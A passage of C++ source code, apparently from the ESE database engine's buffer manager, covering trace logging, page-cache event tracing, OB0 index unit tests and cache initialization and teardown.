if ( err == JET_errFileAccessDenied )
{
WCHAR wszDiffTrace[33];
// rather than disable the traces, we'll just find a different name to log them under
OSStrCbFormatW( wszDiffTrace, sizeof(wszDiffTrace), L".\\bftracePID%d.ftl", DwUtilProcessId() );
err = g_pbfftl->ErrFTLInitWriter( wszDiffTrace, &g_iorBFTraceFile, CFastTraceLog::ftlifReOpenExisting );
}
if ( err == JET_errFileAccessDenied )
{
// So why does this happen? Most likely because some low priv process (like Transport) doesn't have
// permission to write to the current directory which is where we place our file.
g_pbfftl->SetFTLDisabled();
err = JET_errSuccess;
}
Call( err );
}
else
{
g_pbfftl->SetFTLDisabled();
}
HandleError:
if ( err < JET_errSuccess )
{
delete g_pbfftl;
g_pbfftl = NULL;
}
#endif // MINIMAL_FUNCTIONALITY
return err;
}
void BFIFTLTerm()
{
#ifdef MINIMAL_FUNCTIONALITY
return;
#else // !MINIMAL_FUNCTIONALITY
Assert( g_pbfftl != NULL );
g_pbfftl->FTLTerm();
delete g_pbfftl;
g_pbfftl = NULL;
#endif // MINIMAL_FUNCTIONALITY
}
/////////////////////
// BF tracing
#ifdef DEBUG
#define ENABLE_BFFTL_TRACING
#endif
INLINE void BFITraceResMgrInit(
const INT K,
const double csecCorrelatedTouch,
const double csecTimeout,
const double csecUncertainty,
const double dblHashLoadFactor,
const double dblHashUniformity,
const double dblSpeedSizeTradeoff )
{
#ifdef ENABLE_BFFTL_TRACING
(void)ErrBFIFTLSysResMgrInit(
K,
csecCorrelatedTouch,
csecTimeout,
csecUncertainty,
dblHashLoadFactor,
dblHashUniformity,
dblSpeedSizeTradeoff );
#endif // ENABLE_BFFTL_TRACING
ETResMgrInit(
TickOSTimeCurrent(),
K,
csecCorrelatedTouch,
csecTimeout,
csecUncertainty,
dblHashLoadFactor,
dblHashUniformity,
dblSpeedSizeTradeoff );
}
INLINE void BFITraceResMgrTerm()
{
#ifdef ENABLE_BFFTL_TRACING
(void)ErrBFIFTLSysResMgrTerm();
#endif // ENABLE_BFFTL_TRACING
ETResMgrTerm( TickOSTimeCurrent() );
}
INLINE void BFITraceCachePage(
const TICK tickCache,
const PBF pbf,
const BFLatchType bflt,
const ULONG pctPriority,
const BFLatchFlags bflf,
const BFRequestTraceFlags bfrtf,
const TraceContext& tc )
{
GetCurrUserTraceContext getutc;
const BYTE bClientType = getutc->context.nClientType;
#ifdef ENABLE_BFFTL_TRACING
#endif // ENABLE_BFFTL_TRACING
ETCacheCachePage(
tickCache,
pbf->ifmp,
pbf->pgno,
bflf,
bflt,
pctPriority,
bfrtf,
bClientType );
}
INLINE void BFITraceRequestPage(
const TICK tickTouch,
const PBF pbf,
const ULONG pctPriority,
const BFLatchType bflt,
const BFLatchFlags bflf,
const BFRequestTraceFlags bfrtf,
const TraceContext& tc )
{
#ifdef ENABLE_BFFTL_TRACING
GetCurrUserTraceContext getutc;
const BYTE bClientType = getutc->context.nClientType;
(void)ErrBFIFTLTouch(
tickTouch,
pbf->ifmp,
pbf->pgno,
bflt,
bClientType,
pctPriority,
!!( bfrtf & bfrtfUseHistory ),
!!( bfrtf & bfrtfNewPage ),
!!( bfrtf & bfrtfNoTouch ),
!!( bfrtf & bfrtfDBScan ) );
#endif // ENABLE_BFFTL_TRACING
if ( FOSEventTraceEnabled< _etguidCacheRequestPage >() )
{
#ifndef ENABLE_BFFTL_TRACING
GetCurrUserTraceContext getutc;
const BYTE bClientType = getutc->context.nClientType;
#endif
OSEventTrace_(
_etguidCacheRequestPage,
10,
&tickTouch,
&(pbf->ifmp),
&(pbf->pgno),
&bflf,
&( ( (CPAGE::PGHDR *)( pbf->pv ) )->objidFDP ),
&( ( (CPAGE::PGHDR *)( pbf->pv ) )->fFlags ),
&bflt,
&pctPriority,
&bfrtf,
&bClientType );
}
}
INLINE void BFITraceMarkPageAsSuperCold(
const IFMP ifmp,
const PGNO pgno )
{
#ifdef ENABLE_BFFTL_TRACING
(void)ErrBFIFTLMarkAsSuperCold( ifmp, pgno );
#endif // ENABLE_BFFTL_TRACING
ETMarkPageAsSuperCold( TickOSTimeCurrent(), ifmp, pgno );
}
INLINE void BFITraceEvictPage(
const IFMP ifmp,
const PGNO pgno,
const BOOL fCurrentVersion,
const ERR errBF,
const ULONG bfef )
{
const ULONG pctPriority = 0; // Not relevant for eviction anymore.
#ifdef ENABLE_BFFTL_TRACING
(void)ErrBFIFTLEvict( ifmp, pgno, fCurrentVersion, errBF, bfef, pctPriority );
#endif // ENABLE_BFFTL_TRACING
const TICK tickEvictPage = TickOSTimeCurrent();
ETCacheEvictPage( tickEvictPage, ifmp, pgno, fCurrentVersion, errBF, bfef, pctPriority );
}
INLINE void BFITraceDirtyPage(
const PBF pbf,
const BFDirtyFlags bfdf,
const TraceContext& tc )
{
auto tick = TickOSTimeCurrent();
static_assert( sizeof(tick) == sizeof(DWORD), "Compiler magic failing." );
// Note that pbf->lgposModify contains the current lgposModify of the buffer, prior
// to it being updated to reflect the new lgposModify that is triggering the dirty
// operation. Each setting of lgposModify will generate its own trace so that is
// more suitable to determine the lgpos associated with the dirty operation.
// Need to read atomically because removing undo info may change it from under us
// without a latch.
const LGPOS lgposModifyRead = pbf->lgposModify.LgposAtomicRead();
const ULONG lgposModifyLGen = (ULONG)lgposModifyRead.lGeneration;
const USHORT lgposModifyISec = lgposModifyRead.isec;
const USHORT lgposModifyIb = lgposModifyRead.ib;
Assert( (LONG)lgposModifyLGen == lgposModifyRead.lGeneration );
#ifdef ENABLE_BFFTL_TRACING
(void)ErrBFIFTLDirty( pbf->ifmp, pbf->pgno, bfdf, lgposModifyLGen, lgposModifyISec, lgposModifyIb );
#endif // ENABLE_BFFTL_TRACING
Assert( CmpLgpos( pbf->lgposModify.LgposAtomicRead(), lgposModifyRead ) >= 0 );
const CPAGE::PGHDR * ppghdr = (const CPAGE::PGHDR *)pbf->pv;
GetCurrUserTraceContext getutc;
if ( pbf->bfdf < bfdfDirty /* first "proper" dirty */ )
{
// There is no point in logging itagMicFree, cbfree, dbtime because they would be the
// same as the most recent read page trace at this point.
ETCacheFirstDirtyPage(
tick,
pbf->ifmp,
pbf->pgno,
ppghdr->objidFDP,
ppghdr->fFlags,
bfdf,
lgposModifyRead.qw,
getutc->context.dwUserID,
getutc->context.nOperationID,
getutc->context.nOperationType,
getutc->context.nClientType,
getutc->context.fFlags,
getutc->dwCorrelationID,
tc.iorReason.Iorp(),
tc.iorReason.Iors(),
tc.iorReason.Iort(),
tc.iorReason.Ioru(),
tc.iorReason.Iorf(),
tc.nParentObjectClass );
}
ETCacheDirtyPage(
tick,
pbf->ifmp,
pbf->pgno,
ppghdr->objidFDP,
ppghdr->fFlags,
bfdf,
lgposModifyRead.qw,
getutc->context.dwUserID,
getutc->context.nOperationID,
getutc->context.nOperationType,
getutc->context.nClientType,
getutc->context.fFlags,
getutc->dwCorrelationID,
tc.iorReason.Iorp(),
tc.iorReason.Iors(),
tc.iorReason.Iort(),
tc.iorReason.Ioru(),
tc.iorReason.Iorf(),
tc.nParentObjectClass );
}
INLINE void BFITraceSetLgposModify(
const PBF pbf,
const LGPOS& lgposModify )
{
auto tick = TickOSTimeCurrent();
static_assert( sizeof(tick) == sizeof(DWORD), "Compiler magic failing." );
#ifdef ENABLE_BFFTL_TRACING
const ULONG lgposModifyLGen = (ULONG)lgposModify.lGeneration;
const USHORT lgposModifyISec = lgposModify.isec;
const USHORT lgposModifyIb = lgposModify.ib;
Assert( (LONG)lgposModifyLGen == lgposModify.lGeneration );
(void)ErrBFIFTLSetLgposModify( pbf->ifmp, pbf->pgno, lgposModifyLGen, lgposModifyISec, lgposModifyIb );
#endif // ENABLE_BFFTL_TRACING
ETCacheSetLgposModify(
tick,
pbf->ifmp,
pbf->pgno,
lgposModify.qw );
}
INLINE void BFITraceWritePage(
const PBF pbf,
const FullTraceContext& tc )
{
const ULONG bfdfTrace = (ULONG)pbf->bfdf; // We need to put this on the stack because & isn't valid on a bitfield
auto tick = TickOSTimeCurrent();
Assert( tc.etc.iorReason.Iorp() != iorpNone );
#ifdef ENABLE_BFFTL_TRACING
// Update: Now that we're FTL logging from the IO completion, it can cause IO issue
// and sync complete below the existing completion:
// ese!OSSYNC::CLockDeadlockDetectionInfo::AssertCleanApiExit+0xd4 [d:\src\e16\esemulti\sources\dev\ese\published\inc\sync.hxx @ 3408]
// ese!OSDiskIIOThreadCompleteWithErr+0x8a6 [d:\src\e16\esemulti\sources\dev\ese\src\os\osdisk.cxx @ 6984]
// ese!COSFile::ErrIOAsync+0x6ef [d:\src\e16\esemulti\sources\dev\ese\src\os\osfile.cxx @ 1811]
// ese!COSFile::ErrIOWrite+0x2c2 [d:\src\e16\esemulti\sources\dev\ese\src\os\osfile.cxx @ 1111]
// ese!CFastTraceLog::ErrFTLIFlushBuffer+0x9fb [d:\src\e16\esemulti\sources\dev\ese\src\os\trace.cxx @ 2461]
// ese!CFastTraceLog::ErrFTLFlushBuffer+0x3d [d:\src\e16\esemulti\sources\dev\ese\src\os\trace.cxx @ 2494]
// ese!CFastTraceLogBuffer::ErrFTLBTrace+0x2b6 [d:\src\e16\esemulti\distrib\private\inc\trace.hxx @ 598]
// ese!CFastTraceLog::ErrFTLTrace+0x90 [d:\src\e16\esemulti\sources\dev\ese\src\os\trace.cxx @ 2524]
// ese!ErrBFIFTLWrite+0xc7 [d:\src\e16\esemulti\sources\dev\ese\published\inc\bf\bfftl.hxx @ 337]
// ese!BFITraceWritePage+0x111 [d:\src\e16\esemulti\sources\dev\ese\src\ese\bf.cxx @ 6035]
// ese!BFIAsyncWriteComplete+0xc1 [d:\src\e16\esemulti\sources\dev\ese\src\ese\bf.cxx @ 25254]
// ese!COSFile::IOComplete+0xe5 [d:\src\e16\esemulti\sources\dev\ese\src\os\osfile.cxx @ 1592]
// ese!COSFile::IOComplete_+0x26 [d:\src\e16\esemulti\sources\dev\ese\src\os\osfile.cxx @ 1565]
// ese!OSDiskIIOThreadCompleteWithErr+0x907 [d:\src\e16\esemulti\sources\dev\ese\src\os\osdisk.cxx @ 6999]
// ese!OSDiskIIOThreadIComplete+0x150 [d:\src\e16\esemulti\sources\dev\ese\src\os\osdisk.cxx @ 7047]
// ese!CTaskManager::TMIDispatch+0x800 [d:\src\e16\esemulti\sources\dev\ese\src\os\task.cxx @ 766]
// Ultimately this could be fixed by [re]moving FTL tracing off the existing IO mechanism and using
// it's own NT API writing calls, which would also fix the other issue in ErrBFIPrereadPage() at the
// same time.
//(void)ErrBFIFTLWrite( pbf->ifmp, pbf->pgno, BFDirtyFlags( pbf->bfdf ), iorp );
#endif // ENABLE_BFFTL_TRACING
ETCacheWritePage(
tick,
pbf->ifmp,
pbf->pgno,
(((CPAGE::PGHDR *)(pbf->pv))->objidFDP),
(((CPAGE::PGHDR *)(pbf->pv))->fFlags),
bfdfTrace,
tc.utc.context.dwUserID,
tc.utc.context.nOperationID,
tc.utc.context.nOperationType,
tc.utc.context.nClientType,
tc.utc.context.fFlags,
tc.utc.dwCorrelationID,
tc.etc.iorReason.Iorp(),
tc.etc.iorReason.Iors(),
tc.etc.iorReason.Iort(),
tc.etc.iorReason.Ioru(),
tc.etc.iorReason.Iorf(),
tc.etc.nParentObjectClass );
}
////////////////////////////////////////////
// Oldest Begin 0 Index and Overflow List
#ifdef ENABLE_JET_UNIT_TEST
// verifies that the OB0 index will function with the worst case configuration
void BFIOB0UnitTest( const ULONG cSec, const ULONG cbSec )
{
LGPOS lgposPrecision = { 0, 0, 2 * lgenCheckpointTooDeepMax };
Assert( ( cbCheckpointTooDeepUncertainty % cbSec ) == 0 );
LGPOS lgposUncertainty = { 0, (USHORT)( cbCheckpointTooDeepUncertainty / cbSec ), 0 };
BFOB0 bfob0( rankBFOB0 );
BFOB0::ERR errOB0Init = bfob0.ErrInit( lgposPrecision.IbOffset( cSec, cbSec ),
lgposUncertainty.IbOffset( cSec, cbSec ),
99.9 );
Assert( errOB0Init == BFOB0::ERR::errSuccess ||
errOB0Init == BFOB0::ERR::errOutOfMemory );
if ( errOB0Init == BFOB0::ERR::errSuccess )
{
LGPOS lgpos1;
lgpos1.SetByIbOffset( lgposMin.IbOffset( cSec, cbSec ), cSec, cbSec );
BF bf1;
BFOB0::CLock lock;
bfob0.LockKeyPtr( lgpos1.IbOffset( cSec, cbSec ), &bf1, &lock );
BFOB0::ERR errOB0Insert1 = bfob0.ErrInsertEntry( &lock, &bf1 );
bfob0.UnlockKeyPtr( &lock );
Assert( errOB0Insert1 == BFOB0::ERR::errSuccess ||
errOB0Insert1 == BFOB0::ERR::errOutOfMemory );
if ( errOB0Insert1 == BFOB0::ERR::errSuccess )
{
LGPOS lgpos2;
lgpos2.SetByIbOffset( lgpos1.IbOffset( cSec, cbSec ) + 1 * lgposPrecision.IbOffset( cSec, cbSec ) / 4, cSec, cbSec );
BF bf2;
bfob0.LockKeyPtr( lgpos2.IbOffset( cSec, cbSec ), &bf2, &lock );
BFOB0::ERR errOB0Insert2 = bfob0.ErrInsertEntry( &lock, &bf2 );
bfob0.UnlockKeyPtr( &lock );
Assert( errOB0Insert2 == BFOB0::ERR::errSuccess ||
errOB0Insert2 == BFOB0::ERR::errOutOfMemory );
if ( errOB0Insert2 == BFOB0::ERR::errSuccess )
{
LGPOS lgpos3;
lgpos3.SetByIbOffset( lgpos1.IbOffset( cSec, cbSec ) + 2 * lgposPrecision.IbOffset( cSec, cbSec ) / 4 - lgposUncertainty.IbOffset( cSec, cbSec ), cSec, cbSec );
BF bf3;
bfob0.LockKeyPtr( lgpos3.IbOffset( cSec, cbSec ), &bf3, &lock );
BFOB0::ERR errOB0Insert3 = bfob0.ErrInsertEntry( &lock, &bf3 );
bfob0.UnlockKeyPtr( &lock );
Assert( errOB0Insert3 == BFOB0::ERR::errSuccess ||
errOB0Insert3 == BFOB0::ERR::errOutOfMemory );
if ( errOB0Insert3 == BFOB0::ERR::errSuccess )
{
LGPOS lgpos4;
lgpos4.SetByIbOffset( lgpos1.IbOffset( cSec, cbSec ) + 2 * lgposPrecision.IbOffset( cSec, cbSec ) / 4 + 2 * lgposUncertainty.IbOffset( cSec, cbSec ), cSec, cbSec );
BF bf4;
bfob0.LockKeyPtr( lgpos4.IbOffset( cSec, cbSec ), &bf4, &lock );
BFOB0::ERR errOB0Insert4 = bfob0.ErrInsertEntry( &lock, &bf4 );
bfob0.UnlockKeyPtr( &lock );
Assert( errOB0Insert4 == BFOB0::ERR::errKeyRangeExceeded ||
errOB0Insert4 == BFOB0::ERR::errOutOfMemory );
LGPOS lgpos5;
lgpos5.SetByIbOffset( lgpos1.IbOffset( cSec, cbSec ) + 3 * lgposPrecision.IbOffset( cSec, cbSec ) / 4, cSec, cbSec );
BF bf5;
bfob0.LockKeyPtr( lgpos5.IbOffset( cSec, cbSec ), &bf5, &lock );
BFOB0::ERR errOB0Insert5 = bfob0.ErrInsertEntry( &lock, &bf5 );
bfob0.UnlockKeyPtr( &lock );
Assert( errOB0Insert5 == BFOB0::ERR::errKeyRangeExceeded ||
errOB0Insert5 == BFOB0::ERR::errOutOfMemory );
LGPOS lgpos6;
lgpos6.SetByIbOffset( lgpos1.IbOffset( cSec, cbSec ) + 4 * lgposPrecision.IbOffset( cSec, cbSec ) / 4 - 2 * lgposUncertainty.IbOffset( cSec, cbSec ), cSec, cbSec );
BF bf6;
bfob0.LockKeyPtr( lgpos6.IbOffset( cSec, cbSec ), &bf6, &lock );
BFOB0::ERR errOB0Insert6 = bfob0.ErrInsertEntry( &lock, &bf6 );
bfob0.UnlockKeyPtr( &lock );
Assert( errOB0Insert6 == BFOB0::ERR::errKeyRangeExceeded ||
errOB0Insert6 == BFOB0::ERR::errOutOfMemory );
bfob0.LockKeyPtr( lgpos3.IbOffset( cSec, cbSec ), &bf3, &lock );
BFOB0::ERR errOB0Delete3 = bfob0.ErrDeleteEntry( &lock );
Assert( errOB0Delete3 == BFOB0::ERR::errSuccess );
bfob0.UnlockKeyPtr( &lock );
}
bfob0.LockKeyPtr( lgpos2.IbOffset( cSec, cbSec ), &bf2, &lock );
BFOB0::ERR errOB0Delete2 = bfob0.ErrDeleteEntry( &lock );
Assert( errOB0Delete2 == BFOB0::ERR::errSuccess );
bfob0.UnlockKeyPtr( &lock );
}
bfob0.LockKeyPtr( lgpos1.IbOffset( cSec, cbSec ), &bf1, &lock );
BFOB0::ERR errOB0Delete1 = bfob0.ErrDeleteEntry( &lock );
Assert( errOB0Delete1 == BFOB0::ERR::errSuccess );
bfob0.UnlockKeyPtr( &lock );
}
bfob0.Term();
}
}
JETUNITTEST( BF, BFIOB0SmallLogsSmallSectors )
{
BFIOB0UnitTest( ( 128 * 1024 ) / 512, 512 ); // 128 KB logs, 512 B sectors
}
JETUNITTEST( BF, BFIOB0SmallLogsLargeSectors )
{
BFIOB0UnitTest( ( 128 * 1024 ) / ( 4 * 1024 ), 4 * 1024 ); // 128 KB logs, 4 KB sectors
}
JETUNITTEST( BF, BFIOB0LargeLogsSmallSectors )
{
BFIOB0UnitTest( ( 1 * 1024 * 1024 ) / 512, 512 ); // 1 MB logs, 512 B sectors
}
JETUNITTEST( BF, BFIOB0LargeLogsLargeSectors )
{
BFIOB0UnitTest( ( 1 * 1024 * 1024 ) / ( 4 * 1024 ), 4 * 1024 ); // 1 MB logs, 4 KB sectors
}
#endif // ENABLE_JET_UNIT_TEST
// Note: the offset is not pure, meaning in 1:0:0 and 2:0:0 for 5 MB files comes out
// as 8 MB and 16 MB respectively. So we "skipped 3 MBs of offset".
QWORD BFIOB0Offset( const IFMP ifmp, const LGPOS* const plgpos )
{
INST* const pinst = PinstFromIfmp( ifmp );
LOG* const plog = pinst->m_plog;
// This will verify that the lgpos is within the right range
OnDebug( plog->CbLGOffsetLgposForOB0( *plgpos, lgposMin ) );
LGPOS lgposFile = { 0, 0, 1 };
LGPOS lgposIb = { plgpos->ib, plgpos->isec, 0 };
QWORD offsetFile = plog->CbLGOffsetLgposForOB0( lgposFile, lgposMin );
QWORD p2offsetFile = LNextPowerOf2( (LONG)offsetFile );
return p2offsetFile * plgpos->lGeneration + plog->CbLGOffsetLgposForOB0( lgposIb, lgposMin );
}
// Gives the OB0 based uncertainty LGPOS. Normally rounds down, but
// with fNextBucket will round up.
INLINE LGPOS BFIOB0Lgpos( const IFMP ifmp, LGPOS lgpos, const BOOL fNextBucket )
{
INST* const pinst = PinstFromIfmp( ifmp );
LOG* const plog = pinst->m_plog;
lgpos = plog->LgposLGFromIbForOB0(
( plog->CbLGOffsetLgposForOB0( lgpos, lgposMin ) /
cbCheckpointTooDeepUncertainty +
( fNextBucket ? 1 : 0 ) ) *
cbCheckpointTooDeepUncertainty );
// An LGPOS with an lGeneration of less than 1 is not valid by ESE standards. This can happen in
// this function when the uncertainty is bigger then a single log file.
if ( lgpos.lGeneration < 1 )
{
Assert( lgpos.lGeneration == 0 );
lgpos.lGeneration = 1;
lgpos.isec = 0;
lgpos.ib = 0;
}
return lgpos;
}
///////////////////////////////
// Deferred Undo Information
CRITPOOL< BF > g_critpoolBFDUI;
///////////
// Cache
BOOL g_fBFCacheInitialized = fFalse;
//
// g_critCacheSizeSetTarget is used for controlling the setting of and consumption of the cache target (set point).
// There is only one way to set the cache size target via SetOptimalResourcePoolSize (wrapped by BFICacheSetTarget()),
// outside of term / BF tear down. g_critCacheSizeSetTarget also protects writing to these globals:
//
// o cbfCacheTarget: target cache size. This is sensitive to cbfCacheDeadlock.
// o g_cbfCacheTargetOptimal: optimal target cache size. This is the optimal size as calculated by SetOptimalResourcePoolSize(),
// but before applying the cbfCacheDeadlock override.
// o g_cbfCacheUserOverride: cache size override, controlled by JET_paramCacheSize.
// o cbfAvailPoolLow: the low threshold to maintain the available pool at.
// o cbfAvailPoolHigh: the high threshold to maintain the available pool at.
// o cbfAvailPoolTarget: the optimal available pool target.
//
//
// g_critCacheSizeResize guarantees exclusive access to variables that set cache thresholds and therefore get changed
// during an actual resize operation (cache shrinkage or growth):
//
// o cbfInit: the maximum number of buffers ever allocated. The buffer descriptors (i.e., BFs) are all valid in this
// range, but the actual buffers may or may not be reserved or committed.
// o cbfCacheAddressable: the number of buffers which are guaranteed to be reserved, but may or may not be committed.
// o cbfCacheSize: the number of buffers which are currently in an unquiesced state, i.e., reserved and committed.
//
//
// In addition to the cache variables above, g_critCacheSizeResize also guarantees exclusive access to g_bfquiesced, which
// is a list of quiesced buffers which can be unquiesced at any point to fulfill a cache growth request. As a side effect,
// g_critCacheSizeResize also covers getting any buffers in and out of a quiesced state.
//
//
// Summary of expected BF states according to their stage in the buffer lifecycle:
//
// o ibf >= 0 && ibf < cbfCacheAddressable - Buffers may be used (!fAvailable && !fQuiesced), available (fAvailable && !fQuiesced)
// or quiesced (!fAvailable && fQuiesced).
// Used buffers are NEITHER in g_bfavail NOR in g_bfquiesced.
// Available buffers ARE in g_bfavail but NOT in g_bfquiesced.
// Quiesced buffers ARE in g_bfquiesced but NOT in g_bfavail, and are reserved
// but not committed.
//
// o ibf >= cbfCacheAddressable && ibf < cbfInit - Buffers are always quiesced (!fAvailable && fQuiesced), but are NOT in g_bfquiesced,
// and are reserved but not committed.
//
// o ibf >= cbfInit - Buffers have never been committed.
//
//
// WARNING: g_critCacheSizeResize is used as a best-effort-to-acquire critical section and no code should never wait or loop forever
// trying to acquirec it. That is because it needs to be acquired in paths that would violate ranking (specifically, it has the same
// rank as the BF latch), which means we'll potentially deadlock if we do an infinite wait on it.
//
//
// If you want to control explicitly the cache size (such as how cbfCacheDeadlock does), you should update the applicable parameters
// consumed by SetOptimalResourcePoolSize() and then call BFICacheSetTarget(), which will then set the cache size target. If you do
// nothing else, the cache size target will take affect at the next run of the stats task, though cache shrink will dynamically
// take this into account and stop trying to shrink early. If you need to hurry this along you can call ErrBFIMaintCacheSizeRequest().
//
CCriticalSection g_critCacheSizeSetTarget( CLockBasicInfo( CSyncBasicInfo( "g_critCacheSizeSetTarget" ), rankBFCacheSizeSet, 0 ) );
CCriticalSection g_critCacheSizeResize( CLockBasicInfo( CSyncBasicInfo( "g_critCacheSizeResize" ), rankBFCacheSizeResize, CLockDeadlockDetectionInfo::subrankNoDeadlock ) );
volatile LONG_PTR cbfCacheTarget; // Cache set point (target).
volatile LONG_PTR g_cbfCacheTargetOptimal; // Optimal cache set point (target).
LONG_PTR g_cbfCacheUserOverride; // User override for cache set point.
LONG g_cbfCacheResident;
LONG g_cbfCacheClean;
LONG g_rgcbfCachePages[icbPageMax] = { 0 };
ULONG_PTR g_cbCacheReservedSize; // accurate reserved memory
ULONG_PTR g_cbCacheCommittedSize; // accurate committed memory
volatile LONG_PTR cbfCacheAddressable; // total all up, for all buffer sizes
volatile LONG_PTR cbfCacheSize; // total, not including quiesced buffers (i.e., dehydrated to zero)
const LONG g_rgcbPageSize[icbPageMax] =
{
/* icbPageInvalid */ 0,
/* icbPage0 */ 0, // quiesced-decommitted pages
/* icbPage64 */ 64, // micro/u-pages
/* icbPage128 */ 128,
/* icbPage256 */ 256,
/* icbPage512 */ 512,
/* icbPage1KB */ 1024,
/* icbPage2KB */ 2*1024,
/* icbPage4KB */ 4*1024, // small pages
/* icbPage8KB */ 8*1024,
/* icbPage12KB */ 12*1024,
/* icbPage16KB */ 16*1024,
/* icbPage20KB */ 20*1024,
/* icbPage24KB */ 24*1024,
/* icbPage28KB */ 28*1024,
/* icbPage32KB */ 32*1024,
};
// stats
DWORD g_cbfCommitted;
DWORD g_cbfNewlyCommitted;
DWORD g_cbfNewlyEvictedUsed;
DWORD g_cbNewlyEvictedUsed;
DWORD g_cpgReclaim;
DWORD g_cResidenceCalc;
CMovingAverage< LONG_PTR, cMaintCacheSamplesAvg > g_avgCbfCredit( 0 );
BFCacheStatsChanges g_statsBFCacheResidency;
// data (page) storage
LONG_PTR g_cpgChunk;
void** g_rgpvChunk;
ICBPage g_icbCacheMax; // Caution using this variable, try to use the BF::icbPage/icbBuffer appropriate
// status (BF) storage
LONG_PTR cbfInit;
LONG_PTR g_cbfChunk;
BF** g_rgpbfChunk;
// initializes the cache, or returns JET_errOutOfMemory
ERR ErrBFICacheInit( __in const LONG cbPageSizeMax )
{
ERR err = JET_errSuccess;
// reset
Assert( g_critCacheSizeResize.FNotOwner() );
BFICacheIResetTarget();
g_cbfCacheUserOverride = 0;
cbfCacheAddressable = 0;
cbfCacheSize = 0;
g_cbfCacheResident = 0;
g_cbfCacheClean = 0;
memset( g_rgcbfCachePages, 0, sizeof( g_rgcbfCachePages ) );
g_cbCacheReservedSize = 0;
g_cbCacheCommittedSize = 0;
g_cbfCommitted = 0;
g_cbfNewlyCommitted = 0;
g_cbfNewlyEvictedUsed = 0;
g_cbNewlyEvictedUsed = 0;
g_cpgReclaim = 0;
g_cResidenceCalc = 0;
PERFOpt( g_tickBFUniqueReqLast = TickOSTimeCurrent() );
memset( &g_statsBFCacheResidency, 0, sizeof(g_statsBFCacheResidency) );
g_cacheram.Reset();
g_cacheram.ResetStatistics();
g_avgCbfCredit.Reset( 0 );
g_cpgChunk = 0;
g_rgpvChunk = NULL;
cbfInit = 0;
g_cbfChunk = 0;
g_rgpbfChunk = NULL;
Assert( g_rgcbPageSize[icbPage128] == 128 );
Assert( g_rgcbPageSize[icbPage1KB] == 1024 );
Assert( g_rgcbPageSize[icbPage12KB] == 12*1024 );
Assert( g_rgcbPageSize[icbPage32KB] == 32*1024 );
g_icbCacheMax = IcbBFIBufferSize( cbPageSizeMax );
if ( icbPageInvalid == g_icbCacheMax ||
icbPageInvalid == IcbBFIPageSize( cbPageSizeMax ) )
{
Error( ErrERRCheck( JET_errInvalidSettings ) );
}
// set our max usable cache size based on the following variables:
// - total virtual address space available to our process
// - total physical RAM available to our process
// - how much over the total physical RAM we are willing to reserve
// - the minimum configured cache size
const QWORD cbCacheReserveMost = min( size_t( (double)OSMemoryPageReserveTotal() * fracVAMax ),
max( pctOverReserve * OSMemoryTotal() / 100,
UlParam( JET_paramCacheSizeMin ) * g_rgcbPageSize[g_icbCacheMax] ) );
const LONG_PTR cpgChunkMin = (LONG_PTR)( cbCacheReserveMost / cCacheChunkMax / g_rgcbPageSize[g_icbCacheMax] );
for ( g_cpgChunk = 1; g_cpgChunk < cpgChunkMin; g_cpgChunk <<= 1 );
Assert( FPowerOf2( g_cpgChunk ) );
// allocate worst case storage for the data chunk table
Alloc( g_rgpvChunk = new void*[ cCacheChunkMax ] );
memset( g_rgpvChunk, 0, sizeof( void* ) * cCacheChunkMax );
// make our status chunks the same size as our data chunks
g_cbfChunk = g_cpgChunk * g_rgcbPageSize[g_icbCacheMax] / sizeof( BF );
// allocate worst case storage for the status chunk table
Alloc( g_rgpbfChunk = new PBF[ cCacheChunkMax ] );
memset( g_rgpbfChunk, 0, sizeof( PBF ) * cCacheChunkMax );
// set the initial cache size to the minimum cache size
OnDebug( const LONG_PTR cbfInitialCacheSize = max( cbfCacheMinMin, min( UlParam( JET_paramCacheSizeMin ), UlParam( JET_paramCacheSizeMax ) ) ) );
BFICacheSetTarget( OnDebug( cbfInitialCacheSize ) );
// resize the cache to the set size
// Disables the RFS for these 7 LIDs: 33032, 49416, 48904, 65288, 40712, 57096, 44808, 61192, to
// avoid a fault on initialization ... these LIDs are meant to allow us to fail allocations during
// cache resizing operations to prove that we always recover from this.
RFSSuppressFaultInjection( 33032 );
RFSSuppressFaultInjection( 49416 );
RFSSuppressFaultInjection( 48904 );
RFSSuppressFaultInjection( 65288 );
RFSSuppressFaultInjection( 40712 );
RFSSuppressFaultInjection( 57096 );
RFSSuppressFaultInjection( 44808 );
RFSSuppressFaultInjection( 61192 );
Call( ErrBFICacheGrow() );
RFSUnsuppressFaultInjection( 33032 );
RFSUnsuppressFaultInjection( 49416 );
RFSUnsuppressFaultInjection( 48904 );
RFSUnsuppressFaultInjection( 65288 );
RFSUnsuppressFaultInjection( 40712 );
RFSUnsuppressFaultInjection( 57096 );
RFSUnsuppressFaultInjection( 44808 );
RFSUnsuppressFaultInjection( 61192 );
return JET_errSuccess;
HandleError:
BFICacheTerm();
return err;
}
// terminates the cache
void BFICacheTerm()
{
// all cached pages should be gone
C_ASSERT( icbPageMax == _countof(g_rgcbfCachePages) );
#ifndef RTM
for ( LONG icb = 0; icb < _countof(g_rgcbfCachePages); icb++ )
{
AssertRTL( g_rgcbfCachePages[icb] == 0 );
}
#endif // !RTM
// all BFs should be quiesced or available at this point (i.e. no attached DBs)
#ifdef DEBUG
for( LONG_PTR ibf = 0; ibf < cbfInit; ibf++ )
{
const BF * pbf = PbfBFICacheIbf( ibf );
Assert( pbf->fQuiesced || pbf->fAvailable );
}
#endif // DEBUG
// force the cache size to zero
Assert( !g_fBFCacheInitialized ); // means or something so we know it will goto zero?
BFICacheIResetTarget();
// deallocate the cache
Assert( g_critCacheSizeResize.FNotOwner() );
g_critCacheSizeResize.Enter();
BFICacheIFree();
g_critCacheSizeResize.Leave();
g_cacheram.Reset();
#ifndef RTM
// check all buffer size counts are zero
AssertRTL( g_cbCacheReservedSize == 0 );
AssertRTL( g_cbCacheCommittedSize == 0 );
for( INT icbPage = icbPageSmallest; icbPage < icbPageMax; icbPage++ )
{
AssertRTL( g_rgcbfCachePages[icbPage] == 0 );
}
AssertRTL( g_cbfCommitted == 0 );
AssertRTL( g_cbfNewlyCommitted == 0 );
AssertRTL( g_cbfCacheResident == 0 );
AssertRTL( cbfCacheAddressable == 0 );
AssertRTL( cbfCacheSize == 0 );
AssertRTL( g_bfquiesced.FEmpty() );
#endif // !RTM
// free our status chunk table
if ( g_rgpbfChunk )
{
delete [] g_rgpbfChunk;
g_rgpbfChunk = NULL;
}
// free our data chunk table
if ( g_rgpvChunk )
{
delete [] g_rgpvChunk;
g_rgpvChunk = NULL;
}
}
INLINE INT CbBFISize( ICBPage icb )
{
